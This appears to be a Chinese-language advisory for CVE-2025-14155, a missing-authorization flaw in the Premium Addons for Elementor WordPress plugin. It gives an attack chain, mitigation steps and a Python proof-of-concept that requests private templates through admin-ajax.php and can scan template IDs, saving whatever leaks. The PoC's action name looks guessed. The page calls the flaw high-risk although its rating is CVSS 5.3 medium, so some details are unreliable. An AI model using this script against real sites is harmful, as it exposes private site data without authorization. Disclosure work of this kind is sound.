CVE-2025-14155 WordPress Premium Addons for Elementor 未授权信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14155

漏洞类型

未授权访问/敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Premium Addons for Elementor (WordPress插件)

漏洞概述

CVE-2025-14155是WordPress插件Premium Addons for Elementor中的一个高危安全漏洞。该插件是Elementor页面构建器的强大扩展工具，提供高级模板和小组件功能。漏洞源于get_template_content函数缺少权限检查（Missing Authorization/CAP Check），使得未认证的匿名用户可以绕过访问控制机制，访问网站管理员创建的私有模板、草稿模板和待审核状态的模板内容。这些模板可能包含敏感的商业信息、尚未发布的文章内容、数据库结构信息、内部通信记录等。攻击者无需任何凭据即可利用此漏洞，对使用该插件的所有WordPress网站构成严重的信息泄露风险。

技术细节

漏洞位于插件的addons-integration.php文件中，具体在get_template_content函数（约第1624行和第90行）。该函数在处理模板内容请求时，未正确验证当前用户是否具有访问私有模板的权限。正常情况下，只有具有适当WordPress capability（如edit_post）的管理员才能访问草稿或私有状态的帖子/模板，但此函数缺少此类检查。攻击者可以通过构造特定的AJAX请求或直接HTTP请求，传递目标模板ID，服务器将返回该模板的完整内容。攻击利用方式简单，只需知道或猜测模板ID即可，无需任何身份认证。攻击者可以利用泄露的模板内容进行进一步攻击，如识别网站结构、获取敏感配置信息、或利用模板中的潜在漏洞。

攻击链分析

STEP 1

1

攻击者识别目标网站使用的WordPress CMS，并检测是否安装Premium Addons for Elementor插件（版本<=4.11.53）

STEP 2

2

攻击者构造恶意HTTP请求到wp-admin/admin-ajax.php端点，携带action参数为'pa_get_template_content'和目标模板ID

STEP 3

3

由于get_template_content函数缺少权限验证，服务器直接返回指定ID的模板完整内容，包括私有、草稿或待审状态的模板

STEP 4

4

攻击者获取模板内容后，可提取敏感信息（如API密钥、数据库配置、未发布的商业内容等）用于进一步攻击或数据窃取

STEP 5

5

攻击者可能利用泄露的模板代码或配置信息，发现新的攻击面，实施更深层次的入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14155 PoC - Unauthorized Template Content Access
# Target: Premium Addons for Elementor plugin (<= 4.11.53)

def exploit_cve_2025_14155(target_url, template_id=1):
    """
    Exploit for CVE-2025-14155: Missing authorization in get_template_content function
    Allows unauthenticated attackers to view private/draft/pending templates
    
    Args:
        target_url: Base URL of the WordPress site
        template_id: ID of the template to retrieve (default: 1)
    
    Returns:
        Template content if vulnerable, None otherwise
    """
    
    # Method 1: AJAX endpoint (common for WordPress plugins)
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Try the get_template_content action
    data = {
        'action': 'pa_get_template_content',
        'id': template_id
    }
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            # Check if we got template content
            if 'content' in response.text or len(response.text) > 100:
                print(f"[+] VULNERABLE! Template ID {template_id} content:")
                print(response.text)
                return response.text
            else:
                print(f"[-] Template ID {template_id} returned empty or not accessible")
                return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None
    
    return None

def scan_templates(target_url, start_id=1, end_id=100):
    """
    Scan for accessible templates by iterating through IDs
    """
    print(f"[*] Scanning templates on {target_url}...")
    
    for template_id in range(start_id, end_id + 1):
        content = exploit_cve_2025_14155(target_url, template_id)
        if content:
            print(f"[+] Found accessible template: ID {template_id}")
            
            # Save to file for analysis
            with open(f"template_{template_id}_leak.txt", 'w') as f:
                f.write(content)
            print(f"[+] Saved to template_{template_id}_leak.txt")

# Example usage
if __name__ == "__main__":
    target = "http://target-wordpress-site.com"
    exploit_cve_2025_14155(target, 1)
    # scan_templates(target, 1, 50)  # Uncomment to scan multiple IDs

影响范围

Premium Addons for Elementor < 4.11.54

Premium Addons for Elementor <= 4.11.53

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 在Web服务器配置中限制对admin-ajax.php的访问，仅允许已登录用户访问特定action；2) 使用安全插件（如Wordfence）添加临时规则阻止针对该端点的恶意请求；3) 临时禁用或限制Premium Addons插件的模板功能；4) 实施IP白名单策略限制后台访问。但最有效的缓解方式仍是尽快升级到官方修复版本。